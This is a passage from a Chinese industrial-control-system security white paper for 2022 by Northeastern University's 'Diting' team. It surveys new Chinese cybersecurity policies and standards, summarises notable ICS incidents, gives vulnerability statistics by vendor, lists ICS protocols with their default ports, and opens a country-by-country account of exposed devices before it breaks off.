text
stringlengths
196
312k
category
stringclasses
1 value
关键信息基础设施是指公共通信和信息服务、能源、交通、水利、金融、公共 服务、电子政务、国防科技工业等重要行业和领域的, 以及其他一旦遭到破坏、丧 失功能或者数据泄露,可能严重危害国家安全、国计民生、公共利益的重要网络设 施、信息系统等,对国家的稳定发展发挥着极端重要的作用。工业控制系统是关键 信息基础设施的关键核心。随着制造强国、网络强国战略的持续推进,机械、航空、 船舶、汽车、轻工、纺织、食品、 电子等行业生产设备逐渐步入智能化阶段。与此 同时,5G 技术、人工智能、云计算等新一代信息技术与制造技术的加速融合,使得 工业控制系统正从封闭独立逐步走向开放互联。工业控制网络正与 IT 网络进行着深 度融合,在促进工业进一步发展的同时,传统信息网络中的各种安全威胁已经逐步 延伸至工业控制网络中。在党的二十大报告中,习近平总书记着重强调了:“ 要推进 国家安全体系和能力现代化,坚决维护国家安全和社会稳定。”近年来,网络攻击、 网络窃密等危及国家安全行为,给社会生产生活带来了不少安全隐患。如何有效保 障网络与信息安全,是数字时代的重要课题。 2022 年 4 月,为贯彻落实 2022 年《政府工作报告》关于“ 加快发展工业互联网” 的部署要求,扎实推进《工业互联网创新发展行动计划(2021-2023 年)》任务安排, 工信部印发《工业互联网专项工作组 2022 年工作计划》 。从夯实基础设施、深化 融合应用、强化技术创新、完善要素保障等方面,提出了网络体系强基、标识解析 增强、平台体系壮大等 15 大类任务 83 项具体举措。为顺应当前形势,东北大学“谛 听” 网络安全团队基于自身传统的安全研究优势开发设计并实现了“ 谛听” 网络空间 工控设备搜索引擎(http://www.ditecting.com),并根据“谛听”收集的各类安全数据, 撰写并发布《2022 年工业控制网络安全态势白皮书》,读者可以通过报告了解 2022 年工控安全相关政策法规报告及典型工控安全事件分析,同时报告对工控系统漏洞、 联网工控设备、工控蜜罐、威胁情报数据及工业互联网安全创新发展情况进行了阐 释及分析,有助于全面了解工控系统安全现状,多方位感知工控系统安全态势,为 研究工控安全相关人员提供参考。 随着互联网的快速发展,云计算等新型信息技术开始与传统工业进行融合,工业控 制系统逐渐走向智能化。但与此同时,一些网络安全事件层出不穷,工业控制系统在信 息安全方面受到了严峻挑战。因此,我国开始逐步完善工业信息安全政策标准,以便于 提升工业信息安全保障技术,推动整个安全产业的发展。 通过梳理 2022 年度发布的相关政策法规报告,整理各大工业信息安全研究院及机 构针对不同法规所发布的解读文件,现摘选部分重要内容并对其进行简要分析,以供读 者进一步了解国家层面关于工控安全领域的政策导向。 2.1 《工业和信息化领域数据安全管理办法(试行)(征求意见稿)》 2022 年 2 月 10 日,工信部再次公开征求对《工业和信息化领域数据安全管理办法 (试行)》(征求意见稿)的意见。此次发布的征求意见稿调整了数据定义、监管机构 和核心数据目录备案等条款。在工业和信息化领域数据处理者责任方面,征求意见稿明 确了其对数据处理活动负安全主体责任,对各类数据实行分级防护,保证数据持续处于 有效保护和合法利用的状态。该征求意见稿增加了核心数据跨主体处理以及日志留存条 款,要求需要跨主体提供、转移、委托处理核心数据时,应当评估安全风险,采取必要 的安全保护措施,并经由地方工业和信息化主管部门(工业领域)或通信管理局(电信 领域)或无线电管理机构(无线电领域)报工业和信息化部。工业和信息化部严格按照 有关规定对其进行审查。 2.2 《信息安全技术 工业控制系统信息安全防护能力成熟度模型》 2022 年 4 月 15 日,根据国家市场监督管理总局、国家标准化管理委员会发布的中 华人民共和国国家标准公告(2022 年第 6 号),国家标准 GB/T 41400-2022《信息安全 技术 工业控制系统信息安全防护能力成熟度模型》正式发布,并将于 2022 年 11 月进 行正式实施。该标准由中国电子技术标准化研究院联合“产学研用测”41 家单位共同研制, 意在贯彻落实《国务院关于深化“互联网+先进制造业”发展工业互联网的指导意见》有 关要求、进一步推动工业企业落实《工业控制系统信息安全防护指南》防护要点。 2.3 《电力可靠性管理办法(暂行)》 2022 年 4 月 25 日,国家发改委官网公布了《电力可靠性管理办法(暂行)》,并 于 6 月 1 日起开始实施。《办法》第七章对电力网络安全做出了明确要求,其中提出了 电力网络安全坚持积极防御和综合防范的方针;电力企业应当落实网络安全保护责任, 健全网络安全组织体系;电力企业应当强化电力监控系统安全防护;电力用户应当根据 国家有关规定和标准开展网络安全防护,预防网络安全事件,防止对公用电网造成影响; 国家能源局依法依规履行电力行业网络安全监督管理职责等具体要求。 2.4 《电力行业网络安全管理办法(修订征求意见稿)》 2022 年 6 月 14 日,国家能源局对《电力行业网络与信息安全管理办法》(国能安 全〔2014〕317 号,为加强电力行业网络安全监督管理以及规范电力行业网络安全工作, 根据《中华人民共和国网络安全法》《中华人民共和国密码法》《中华人民共和国数据 安全法》《中华人民共和国个人信息保护法》《中华人民共和国计算机信息系统安全保 护条例》《关键信息基础设施安全保护条例》及国家有关规定,制定本办法。)、《电 力行业信息安全等级保护管理办法》(国能安全〔2014〕318 号,为规范电力行业网络 安全等级保护管理,提高电力行业网络安全保障能力和水平,维护国家安全、社会稳定 和公共利益,根据《中华人民共和国网络安全法》《中华人民共和国密码法》《中华人 民共和国计算机信息系统安全保护条例》《关键信息基础设施安全保护条例》《信息安 全等级保护管理办法》等法律法规和规范性文件,制定本办法。)进行修订,形成了《电 力行业网络安全管理办法(修订征求意见稿)》《电力行业网络安全等级保护管理办法 (修订征求意见稿)》,向社会公开征求意见。 2.5 《数据出境安全评估办法》 2022 年 7 月 7 日,国家互联网信息办公室公布了《数据出境安全评估办法》(以下 简称《办法》),并于 2022 年 9 月 1 日起开始施行。出台《办法》是为了更好的落实 《网络安全法》、《数据安全法》、《个人信息保护法》的规定,并且有利于保护个人 信息的权益,社会公共的利益,规范数据出境的活动以及维护国家的安全。该《办法》 也规定了数据出境安全评估的范围、条件和程序,并具体指明数据出境安全评估工作的 方法。 2.6 《关于开展网络安全服务认证工作的实施意见(征求意见稿)》 2022 年 7 月 21 日,市监总局发布《关于开展网络安全服务认证工作的实施意见(征 求意见稿)》,公开征求意见至 8 月 21 日。应当依法设立从事网络安全服务认证活动 的认证机构,保证其具备从事网络安全服务认证活动的专业能力,并严格经过市场监管 总局征求中央网信办、公安部意见后批准取得资质。严格要求网络安全服务认证机构公 开认证收费标准和认证证书有效、暂停、注销或者撤销等状态,按照有关规定报送网络 安全服务认证实施情况及认证证书信息。 2.7 《关于修改〈中华人民共和国网络安全法〉的决定(征求意见稿)》 2022 年 9 月 14 日,国家互联网信息办公室会同相关部门起草了《关于修改〈中华 人民共和国网络安全法〉的决定(征求意见稿)》,并向社会公开征求意见。意见反馈 截止时间为 2022 年 9 月 29 日。自 2017 年《中华人民共和国网络安全法》开始实施后, 其为维护网络空间主权和国家安全、社会公共利益,保护公民等合法权益,提供了有力 法律保障。随着社会形势的发展,拟对《中华人民共和国网络安全法》进行修改,使其 法律责任制度能够更加完善,能够更加有效的保障网络的安全。 2.8 《信息安全技术 关键信息基础设施安全保护要求》 2022 年 10 月 12 日,国家标准化管理委员会发布 2022 年第 14 号中华人民共和国国 家标准公告,批准发布国家标准 GB/T 39204-2022《信息安全技术 关键信息基础设施安 全保护要求》,《信息安全技术 关键信息基础设施安全保护要求》规定了关键信息基 础设施运营者在识别分析、安全防护、检测评估等方面的安全要求。此次标准的发布, 意味着我国的国家关键信息基础设施(电力,燃气,水力,石化等)工业控制系统的网 络安全保护将纳入国家监督成为强制要求,标志着我国关键信息基础设施安全保障体系 的建设进一步完善,为运营者开展关键信息基础设施的安全保护工作提供更有效的规范 和引领。标准将于 2023 年 5 月 1 日开始实施。 2.9 《工业互联网 总体网络架构》 2022 年 10 月 14 日,国家标准化管理委员会发布 2022 年第 13 号中华人民共和国国 家标准公告,批准发布国家标准 GB/T 42021-2022《工业互联网 总体网络架构》。《工 业互联网 总体网络架构》是我国首个在工业互联网网络领域中发布的国家标准,其规 范了工业互联网工厂内外网络架构的目标架构和功能要求,并且表明了工业互联网网络 实施的框架以及对安全方面的要求,相关标准的规定有助于提升全行业全产业的数字化、 网络化以及智能化水平,能够进一步促进相关产业向数字化转型。该标准将于 2023 年 5 月 1 日开始实施。 2.10 《网络产品安全漏洞收集平台备案管理办法》 2022 年 10 月 28 日,工业和信息化部近日印发《网络产品安全漏洞收集平台备案管 理办法》。《办法》规定,将采取网上备案的形式进行,通过工业和信息化部网络安全 威胁和漏洞信息共享平台对漏洞收集平台进行备案。相关参与者需在该共享平台上如实 填报网络产品安全漏洞收集平台的备案登记信息。该《办法》将于 2023 年 1 月 1 日起 施行。 2.11 《信息安全技术 网络安全服务能力要求》 2022 年 11 月 9 日,全国信息安全标准化技术委员会秘书处发布《信息安全技术 网 络安全服务能力要求》(征求意见稿),并向社会公开征求意见,该意见征求截止时间 为 12 月 9 日。该文件严格要求了网络安全服务机构所提供的安全服务应该具备的能力 水平。该文件能够对网络安全服务机构开展网络安全服务能力建设进行有效指导,同时 也可以帮助政务部门以及关键信息基础设施运营者选择合适的网络安全服务机构。 2.12 《信息安全技术 关键信息基础设施网络安全应急体系框架》 2022 年 11 月 17 日,全国信息安全标准化技术委员会秘书处发布《信息安全技术关 键信息基础设施网络安全应急体系框架》(征求意见稿),并向社会征求意见,该意见 征求截止时间为 2023 年 1 月 16 日。征求意见稿给出了关键信息基础设施网络安全应急 体系框架,其中主要包括机构设立、分析识别以及事后恢复与总结等。该文件有助于关 键信息基础设施运营者建立健全网络安全应急体系、开展网络安全应急活动,同时可以 为关键信息基础设施安全保护的其他相关方提供参考。 表 2-1 2022 年国内部分出台政策 序号 月份 出台政策 1 2 月 《工业和信息化领域数据安全管理办法(试行)》(征求意见稿) 2 2 月 《工业和信息化部办公厅关于做好工业领域数据安全管理试点工作的通知》 3 2 月 《工业互联网安全标准体系》 4 4 月 《信息安全技术 工业控制系统信息安全防护能力成熟度模型》 5 4 月 《电力可靠性管理办法(暂行)》 6 6 月 《电力行业网络安全管理办法(修订征求意见稿)》 7 7 月 《数据出境安全评估办法》 8 7 月 《关于开展网络安全服务认证工作的实施意见(征求意见稿)》 9 7 月 《信息安全技术 信息安全管理体系 概述和词汇》 10 8 月 《公路水路关键信息基础设施安全保护管理办法(征求意见稿)》 11 9 月 《关于修改(中华人民共和国网络安全法)的决定(征求意见稿)》 12 10 月 《信息安全技术 关键信息基础设施安全保护要求》 13 10 月 《工业互联网 总体网络架构》 14 10 月 《数字化转型 价值效益参考模型》、《供应链数字化管理指南》、 《生产设备运行管理规范》、《生产设备运行绩效评价指标集》 15 10 月 《网络产品安全漏洞收集平台备案管理办法》 16 11 月 《信息安全技术 网络安全服务能力要求》(征求意见稿) 17 11 月 《信息安全技术 关键信息基础设施网络安全应急体系框架》(征求意见稿) 18 12 月 《工业互联网企业网络安全 第 4 部分:数据防护要求》(征求意见稿) 19 12 月 《电力行业网络安全管理办法》 20 12 月 《电力行业网络安全等级保护管理办法》 21 12 月 《工业和信息化领域数据安全管理办法(试行)》 时至 2022,全球局势变化风云莫测,工控安全是国家安全保障、社会稳定运行的重 要基石。工控网络的应用涉及了社会中的各个重要行业如通信、电力、燃油等。社会中 的各个机构、组织、企业在疫情下稳步的复产复工,恢复工作秩序,离不开工控网络的 安全。 以下介绍 2022 年发生的一些典型工控安全相关事件,通过以下事件可以了解工业 控制网络环境下各种攻击的技术特性和趋势,以此来制定更加有效的相关策略应对未来 可能遭受的攻击。 3.1 德国主要燃料储存供应商遭网络攻击 2022 年 1 月 29 日,德国的一家名为 Oiltanking GmbH Group 的石油储存公司遭到 了网络攻击。本次攻击主要是针对 Oiltanking 公司以及矿物油贸易公司 Mabanaft ,对其 造成了一定的影响。Oiltanking 和 Mabanaft在他们的联合声明中表示他们正在尽力解决 该问题,并了解其波及的范围。同时由于受到本次攻击事件的影响,欧洲西北部地区馏 分柴油的价格有略微的涨幅。 3.2 FBI 警报:美国关键基础设施正遭受 BLACKBYTE 勒索软件入侵 2022 年 2 月 11 日,美国联邦调查局和美国特勤局联合发布了《联合网络安全咨询 公告》。公告中指出:名为 BlackByte 的软件勒索组织在过去的 3 个月期间,入侵了至 少 3 个美国关键基础设施组织,尤其是政府设施、金融服务以及食品和农业领域。该组 织会将其勒索软件基础设施出租给他人,以此来换取一定比例的勒索收益,该组织自 2021 年 7 月开始开发软件漏洞,全球范围内的企业都可能成为其目标。 3.3 白俄罗斯铁路遭到 ANONYMOU 入侵 ,所有网络服务中断 2022 年 2 月 27 日,黑客组织 Anonymou 声称已经入侵了白俄罗斯铁路的内部网络, 并且攻击并关闭了其内部网络的所有服务。目前网站 pass.rw.by、portal.rw.by、rw.by 都 处于无法访问的状态,该国的铁路系统被迫转入手动控制模式,这对白俄罗斯铁路列车 的正常运营以及铁路秩序都造成了极大的影响和破坏。Anonymou 组织还入侵了白俄罗 斯的武器制造商 Tetraedr ,并窃取了大约 200GB 的电子邮件。 3.4 东欧大型加油站遭勒索攻击 ,官网、APP 等全部下线 2022 年 3 月 6 日,东欧国家罗马尼亚的一家加油站遭到了勒索软件攻击,该加油站 的 Fill&Go服务以及官方网站都因本次攻击而被迫下线。本次攻击影响到了该公司的大 部分业务,导致了官网、APP 都无法正常访问,顾客只能使用现金和刷卡进行支付。 这家公司名为 Rompetrol ,是罗马尼亚国内最大的炼油厂 Petromidia Navodari 的配 套加油站运营商。攻击者还入侵了 Petromdia炼油厂内部的网络,但该网络的运营暂未 发现受到了影响。 3.5 乌克兰的能源供应商成为 INDUSTROYER2 ICS 恶意软件的目标 2022 年 4 月 12 日,一种新的能够操控工业控制系统造成损害的恶意软件最近将乌 克兰的一家能源供应商作为了攻击的目标。该攻击主要针对的是变电站,乌克兰的计算 机应急响应小组、网络安全公司和微软公司已经对其进行了分析。经分析发现,该攻击 行动与一个威胁组织 Sandworm有关,该组织据信代表俄罗斯 GRU 军事情报机构运作。 根据网络安全公司的说法,该攻击的目的可能是在目标能源设施中执行破坏性的操作进 而导致停电,本次安全事件涉及了在 ICS 网络以及运行 Solaris和 Linux 的系统中部署的 几种恶意软件。 3.6 农业机械巨头爱科遭勒索攻击 ,美国种植季拖拉机供应受影响 2022 年 5 月 7 日,美国农业机械巨头爱科遭到了勒索软件的攻击,对部分生产设施 的运营造成了影响,并且该影响可能会持续多天。本次事件中,爱科公司并没有提供任 何关于业务中断的细节信息,为了阻止攻势蔓延该公司可能会关闭部分系统。有经销商 表示,这导致拖拉机销售在美国最重要的种植季节停滞不前。近一年来已经有多家农业 供应链企业遭到攻击,可见农业逐渐成为了勒索攻击的重点目标。同时受到紧张的国际 政治局势的影响,部分网络攻击可能还具有报复性动机,目的是破坏美国关键基础设施 企业的生产活动。 3.7 得克萨斯州一家液化天然气厂遭黑客攻击导致爆炸 2022 年 6 月 8 日,德克萨斯州一家液化天然气厂发生爆炸。爆炸发生在德克萨斯州 金塔纳岛的自由港液化天然气液化厂(名为 Freeport LNG 公司)和出口码头。华盛顿时 报一国家安全作家 Rogan 证实:德克萨斯州的液化天然气设施爆炸与 APT 组织进行的 黑客活动一致。Freeport LNG 拥有运营技术以及工业控制系统网络检测系统,但否认了 将网络攻击视为事件发生的根本原因。除非 Freeport LNG 适当部署了 OT/ICS 网络检测 系统并完成了取证调查,否则不能排除网络攻击。此次爆炸事故将对自由港液化天然气 的运营产生持久的影响。 3.8 伊朗 LYCAEUM APT 组织利用新的 DNS 后门攻击能源行业 2022 年 6 月 10 日,伊朗 Lycaeum APT 黑客组织使用新的基于.NET 的 DNS 后门, 以对能源和电信行业的公司进行攻击。Lyceum 曾使用 DNS 隧道后门瞄准中东的通信服 务提供商。Zscaler 最近的一项分析提出了一种新的 DNS 后门,该后门基于 DIG.net 开 源工具可以执行“DNS 劫持”攻击、执行命令、丢弃更多有效负载并泄露数据。DNS 劫 持是一种重定向攻击,它依赖于 DNS 查询操作,将尝试访问合法站点的用户带到威胁 参与者控制下的服务器上托管的恶意克隆。 3.9 德国建材巨头 KNAUF被 BLACK BASTA 勒索软件团伙袭击 2022 年 7 月 19 日消息,德国建材巨头 Knauf 集团表示它已成为网络攻击的目标, 该攻击扰乱了其业务运营。据悉,网络攻击发生在 6 月 29 日晚上, 目前,可耐夫仍在 进行调查取证、事件处理和补救工作。虽然 Knauf 没有公布他们所遭受的网络攻击的类 型,但根据恢复正常运营的时间、影响和难度可以推断这大概率是一起勒索软件事件。 名为 Black Basta 的勒索软件团伙已经在其勒索网站上发布公告宣布对这次攻击负责, 并于 7 月 16 日将 Knauf 列为受害者。勒索软件团伙目前已经泄露了 20%的被盗文件, 超过 350 名访问者访问了这些文件。并非所有文件都已在线泄露的事实表明,威胁行为 者仍有希望获得成功的谈判结果并获得赎金。 3.10 希腊天然气分销商 DESFA 部分基础设施遭受网络袭击 2022 年 8 月 20 日,希腊最大的天然气分销商 DESFA 表示在其部分基础设施上遭 受了网络攻击,攻击者试图非法访问电子数据,并可能泄露了许多目录和文件。8 月 19 日,Ragnar Locker 勒索软件组织在其暗网数据泄露网站上泄露了 DESFA 的数据样本及 被盗数据列表,这也证实了此次攻击。泄露的数据样本不包含机密信息。Ragnar Locker 在其暗网上表示,DESFA 的系统中存在多个安全漏洞,会导致公司的敏感数据受到损 害。Ragnar Locker 已将此类漏洞通知了 DESFA ,然而并没有收到回应。因此 Ragnar Locker 发布了从 DESFA 网络下载的数据列表,并威胁如果 DESFA 没有在规定时间内 采取行动,也没有联系威胁行为者以解决安全问题,将发布文件列表中包含的所有文件。 3.11 黑客组织 GHOSTSEC 入侵以色列各地的 55 个 PLC 2022 年 9 月 12 日,巴勒斯坦的黑客组织 GhostSec声称他们破坏了多达 55 个Berghof 可编程逻辑控制器(PLC),这些 PLC 被以色列组织用作“Free Palestine”运动的一部分。 GhostSec 于 2015 年首次被发现, 自称治安组织,最初成立的目的是针对宣扬伊斯兰极 端主义的 ISIS 网站。9 月 4 日,GhostSec 在其 Telegram 频道上分享了一段视频,展示 了成功登录 PLC 管理面板的过程,此外还转储了被黑客入侵控制器的数据。同时, GhostSec 发布了更多的截图,声称已经获得了另一个控制面板的权限,可以用来改变水 中的氯含量和 PH 值。工业网络安全公司 OTORIO 对此事进行了更深入的调查后表示, 发生此次入侵的原因可能是因为 PLC 可以通过互联网访问,而且使用的是可以轻易猜 到的凭证。 3.12 黑客组织 KILLNET 对美国机场网站发起分布式拒绝服务(DDOS)攻击 2022 年 10 月 10 日,亲俄黑客组织 KillNet 声称对美国几个主要机场的网站进行了 大规模分布式拒绝服务(DDoS)攻击,导致其无法访问。DDoS 攻击通过垃圾请求使托管 这些网站的服务器无法运作,使旅客无法连接并获取有关其定期航班或预订机场服务的 更新。被攻击的机场包括芝加哥奥黑尔国际机场(ORD) 、奥兰多国际机场(MCO) 、丹佛 国际机场(DIA)、凤凰城天港国际机场(PHX) ,以及肯塔基州、密西西比州和夏威夷的一 些机场。虽然 DDoS 攻击不会影响航班,但仍然对关键经济部门的运作产生了不利影响, 可能将会造成相关服务的暂缓甚至是瘫痪。KillNet 的创始人 KillMilk 还表示,他们正在 计划进一步的攻击,涉及更严重的技术,包括旨在破坏数据的擦除器攻击。 3.13 网络攻击导致丹麦最大铁路公司火车全部停运 2022 年 11 月 5 日,由于遭受了网络攻击导致服务器关闭,丹麦最大的铁路运营公 司 DSB 旗下所有列车均陷入停运,且连续数个小时未能恢复。遭受攻击的是丹麦公司 Supeo ,该公司是一家专为铁路、交通基础设施和公共客运提供资产管理解决方案的外 包供应商。Supeo 可能经受了一次勒索软件攻击,但该公司并未披露任何信息。Supeo 公司提供了一款移动应用,可供火车司机访问各项关键运营信息,例如限速指标和铁路 运行信息。由于服务器关闭,导致该应用停止工作,司机们只能被迫停车,最终引发了 列车运营中断事件。 3.14 乌克兰政府机构和国家铁路遭受新一波网络钓鱼攻击 2022 年 12 月 8 日,乌克兰计算机应急响应小组报道,乌克兰政府机构和国家铁路 遭受网络钓鱼攻击。攻击者被响应小组追踪为 UAC-0140 ,他们使用电子邮件分发由 Delphi 编程语言开发的名为 DolphinCape恶意软件。这种恶意软件可以采集被攻击电脑 的信息,包括主机名、用户名、比特率和操作系统版本等等,该软件还会运行可执行文 件、提取其他关键数据、并对目标设备进行屏幕截图等操作,严重影响被攻击者的电脑 的运行安全。乌克兰安全官员认为,俄罗斯黑客是大多数攻击的幕后黑手。 表 3- 1 2022 年部分安全事件 序号 时间 国家/地区 行业 方式 影响 1 1 月 德国 制造业 未知 欧洲北部地区柴油涨价 2 1 月 荷兰 能源业 勒索软件 石油装卸和转运受阻 3 2 月 美国 农业 勒索软件 勒索高额赎金 4 2 月 白俄罗斯 运输业 未知 铁路运营秩序受影响,资料泄露 5 2 月 瑞士 运输业 勒索软件 运营受到干扰 6 3 月 罗马尼亚 能源业 勒索软件 油站官网、APP 无法访问 7 3 月 德国 能源业 勒索软件 近 6000 台风力发电机失去远程控制 8 4 月 乌克兰 能源业 恶意软件 变电站停电 9 4 月 德国 制造业 网络攻击 被迫关闭多个业务部门的系统 10 4 月 加拿大 制造业 网络攻击 航班延误,大量旅客滞留机场 11 5 月 美国 农业 勒索软件 公司被迫关闭系统、销售停滞 12 5 月 印度 航空业 勒索软件 航班延误、旅客滞留机场 13 6 月 美国 建筑业 恶意流量混合 探测到更多新的恶意软件变种和与攻 击者相关的 TTP 14 6 月 土耳其 航空业 未知 严重的数据泄露 15 6 月 美国 能源业 网络攻击 液化天然气厂的运营产生了持久影响 16 7 月 德国 制造业 勒索软件 文件泄露、被索要高额赎金 17 7 月 伊朗 制造业 网络攻击 严重扰乱工厂运营 18 7 月 西班牙 工业 网络攻击 辐射警报网络无法响应辐射激增事件 19 8 月 希腊 能源业 勒索软件 大量数据遭到泄露 20 8 月 英国 医疗业 网络攻击 急救热线持续性中断 21 9 月 巴勒斯坦 工业 网络入侵 多个 PLC 可以被攻击者控制 22 10 月 美国 航空业 DDoS 攻击 航空公司网站的服务器无法运作 23 10 月 德国 新闻业 勒索软件 系统陷入瘫痪,电子版文件无法访问 24 11 月 乌克兰 互联网 勒索软件 恶意脚本入侵网络 25 11 月 德国 制造业 网络攻击 数据泄露,被索要赎金 26 12 月 乌克兰 运输业 网络钓鱼攻击 电脑被恶意操控、数据泄露 27 12 月 哥伦比亚 能源业 勒索软件 大量数据泄露 28 12 月 德国 制造业 网络攻击 有可能造成数据泄露 随着工业 4.0 、智能制造、工业互联网等概念的产生和发展,全球工控产业体系迅 速扩大,工控系统的独立性日益降低,理论上来说对工控系统的攻击实现将更加简单, 例如 PLC 等 ICS 的核心构成将面对更多样的攻击手段、更隐蔽的攻击形式等。相关数 据显示,2022 年西门子(Siemens)、施耐德(Schneider)、北京亚控科技发展有限公 司(WellinTech)、三菱(Mitsubishi)、欧姆龙(Omron)等工业控制系统厂商也均被 发现包含各种信息安全漏洞。然而本团队从采集到的工控漏洞数据中注意到,近两年的 工控安全漏洞数量呈逐年下降的趋势。 图 4- 1 2012-2022 年工控漏洞走势图(数据来源 CNVD 、“谛听”) 根据 CNVD(国家信息安全漏洞共享平台)[1][2]和“谛听” 的数据,2012-2022 年工控 漏洞走势如图 4- 1 所示。从图中可以看出,2015 年到 2020 年期间工控漏洞数量呈显著 的逐年增长趋势,出现这种情况的主要原因,本团队分析认为是:2015 年后,技术融合 加速工控产业发展的同时破坏了传统工控系统的体系结构,在产业标准、政策尚不成熟 的情况下攻击者可能会采取更加丰富的攻击手段攻击工控系统,导致工控漏洞的数量逐 年上升。然而从 2021 年开始,工控漏洞数量呈逐年下降的趋势,与 2020 年的 568 条漏 洞信息相比,2021 年减少了 416 条,漏洞数量大幅降低,减少数量占 2020 年的 73%, 2022 年的漏洞数量降幅虽不及 2021 年的 73%,但仍达到了 37% ,本团队猜测出现的原 因是:一方面,由于新冠疫情在全球反复暴发,大量从业人员线上办公,工控产业活力 低下,导致工控攻击目标的数量与类型较往年有所减少,工控漏洞的产生和发现可能会 因此减少;另一方面,随着工控信息安全政策、体系、法规的不断完善,工控安全方面 的产品体系和解决方案愈发健全,客观上的漏洞数量下降应在情理之中。 图 4-2 2022 年工控系统行业漏洞危险等级饼状图(数据来源 CNVD 、“谛听”) 如图 4-2 所示,2022 年工控系统行业漏洞危险等级饼状图,截至 2022 年 12 月 31 日,2022 年新增工控系统行业漏洞 96 个,其中高危漏洞 35 个,中危漏洞 51 个,低危 漏洞 10 个。与去年相比,漏洞数量减少了 56 个,高危、中危和低危漏洞数量均有一定 减少,其中,中高危漏洞数量减少了 54 个, 占 2021 年中高危漏洞总数的 39% 。2022 全年高危工控安全漏洞占全年漏洞总数量中的 36% ,与 2021 年相比相差不大。由此可 见,今年的全球工控安全体系建设更加完备,工控产业相关厂商、企业的研究更加深入, 情况较为乐观,但同时高危漏洞数量占比仍然较大,需要持续完善工控方面的协议、政 策,增加对工控信息安全产业的投入。 以上数据表明,在 2022 年,虽然工控漏洞数量的降幅较 2021 年有所降低,但全球 工控系统的安全维护水平依然持续提升;同时我们注意到高危漏洞数量占比变化不大, 理想情况下,风险等级被标记为“ 高危” 的漏洞数量应当在工控相关协议、设备设计之初 尽量避免,或在被工控系统安全人员发现时及时解决,其相比中低危漏洞具有更高的处 理优先级,故工控系统所遭受攻击数量虽然在近两年逐年减少,但工控系统所遭受的攻 击强度可能并没有降低,或者说工控系统方面设计缺陷可能并没有得到及时完善,同时 工控产业相关单位有必要进一步加强对工业漏洞的防范,并持续增加对工控系统安全建 设的投入。 图 4-3 2022 年工控系统行业厂商漏洞数量柱状图(数据来源 CNVD 、“谛听”) 如图4-3 是2022 年工控系统行业厂商漏洞数量柱状图,由图中可知,西门子(Siemens) 厂商具有的漏洞数量最多,多达 37 个 。漏洞数量排在其后的厂商分别是:施耐德 (Schneider)、亚控科技(WellinTech)、三菱(Mitsubishi)、台达(Delta)、欧姆龙 (Omron),这些厂商也存在着一定数量的工控系统行业漏洞。由此可见,各个厂商应 该密切关注工控系统行业漏洞,通过部署终端安全防护组件、部署防火墙、入侵检测系 统、入侵防护系统或安全监测系统等方式进一步提升系统防护水平,确保工控系统信息 安全。 “谛听” 网络空间工控设备搜索引擎共支持 31 种服务的协议识别,表 5- 1 展示了“谛 听” 网络安全团队识别的工控协议等的相关信息。如想了解这些协议的详细信息请参照 “谛听” 网络安全团队之前发布的工控网络安全态势分析白皮书。 表 5- 1 “谛听” 网络空间工控设备搜索引擎支持的协议 工控协议 Modbus Tridium Niagara Fox SSL/ Niagara Fox BACnet ATGs Devices Moxa Nport EtherNet/IP Siemens S7 DNP3 Codesys ilon Smartserver Redlion Crimson3 IEC 60870-5-104 OMRON FINS CSPV4 GE SRTP PCWorx ProConOs MELSEC-Q 端口 502/503 1911 4911 47808 10001 4800 44818 102 20000 2455 1628/1629 789 2404 9600 2222 18245 1962 20547 5006/5007 概述 应用于电子控制器上的一种通用语言 Tridium 公司专用协议,用于智能电网等领域 智能建筑、基础设置管理、安防系统的网络协议 智能建筑的通信协议 工控协议 虚拟串口协议 以太网协议 西门子通信协议 分布式网络协议 PLC 协议 智能服务器协议 工控协议 IEC 系列协议 欧姆龙工业控制协议 工控协议 美国通用电器产品协议 菲尼克斯电气产品协议 科维公司操作系统协议 三菱通信协议 opc-ua 4840 OPC UA 接口协议 DDP 5002 用于数据的传输和 DTU 管理 Profinet 80 基于工业以太网技术的自动化总线标准 IEC 61850-8-1 102 IEC 系列协议 Lantronix 30718 专为工业应用而设计,解决串口和以太网通信问题 物联网协议 端口 概述 AMQP 5672 提供统一消息服务的应用层标准高级消息队列协议 XMPP 5222 基于 XML 的可扩展通讯和表示协议 SOAP 8089 基于 XML 简单对象访问协议 ONVIF 3702 开放型网络视频接口标准协议 MQTT 1883 基于客户端-服务器的消息发布/订阅传输协议 摄像头协议 端口 概述 Dahua Dvr 37777 大华摄像头与服务器通信协议 hikvision 81-90 海康威视摄像头与服务器通信协议 “谛听” 官方网站(www.ditecting.com)公布的数据为 2017 年以前的历史数据,若需 要最新版的数据请与东北大学“谛听” 网络安全团队直接联系获取。根据“谛听” 网络空间 工控设备搜索引擎收集的内部数据,经“谛听” 网络安全团队分析,得出如图 5- 1 的可视 化展示,下面做简要说明。 图 5- 1 为 2022 年全球工控设备暴露 Top- 10 国家。在图中可以看到,国家排名较 2021 年基本没有发生太大变化。在全球范围内,美国作为世界上最发达的工业化国家暴露出 的工控设备仍然保持第一;中国继续大力发展先进制造业,推动新型基础设施建设,工 业产值大幅增加,位居第二;2022 年波兰的 GDP 有所增长,暴露的工控设备也有所增 长,位居第三。以下着重介绍国内及美国、波兰的工控设备暴露情况。 图 5-1 全球工控设备暴露 Top10 柱状图(数据来源“谛听”) 5.1 国际工控设备暴露情况 国际工控设备的暴露情况以美国和波兰为例进行简要介绍。 美国是世界上工业化程度最高的国家之一,同时也是 2022 年全球工控设备暴露最 多的国家,如图 5-2 所示为美国 2022 年工控协议暴露数量和占比。自 2012 年美国通用 电气公司(GE)提出工业互联网的概念以来,美国政府就十分重视工业控制领域。依 托互联网技术的发展优势,大力推动工控相关技术的发展,以应对经济全球化可能带来 的机遇与挑战。在推动工业互联网革命的同时,美国政府也关注到了由于缺乏监管而泄 露的数据可能带来的一系列互联网安全问题。2022 年 9 月,美国网络安全和基础设施安 全局(CISA)发布了《2023 年至 2025 年战略规划》(2023-2025 Strategic Plan),该规 划是 CISA 自 2018 年成立以来发布的首个综合性战略规划,规划中明确了美国未来三年 网络防御、减少风险和增强恢复能力、业务协作、统一机构 4 个总的网络安全目标。 图 5-2 美国工控协议暴露数量和占比(数据来源“谛听”) 虽然美国是最早投身网络安全建设的国家之一,但在工业控制系统网络安全方面的 表现仍然有待提高。与 2021 年相比,美国 2022 年暴露的工控设备数有所减少。可能是 受俄乌战争的影响,美国政府认识到工控设备及其之上运行的大量关键基础设施的重要 性,因此更加重视工控领域的安全问题。2022 年的全球网络空间安全形势愈发复杂,美 国政府愈发重视工业控制系统安全。 2022 年波兰工控设备暴露数量位居全球第三。波兰地处欧洲中部,属于发展中国家, 但其人均 GDP 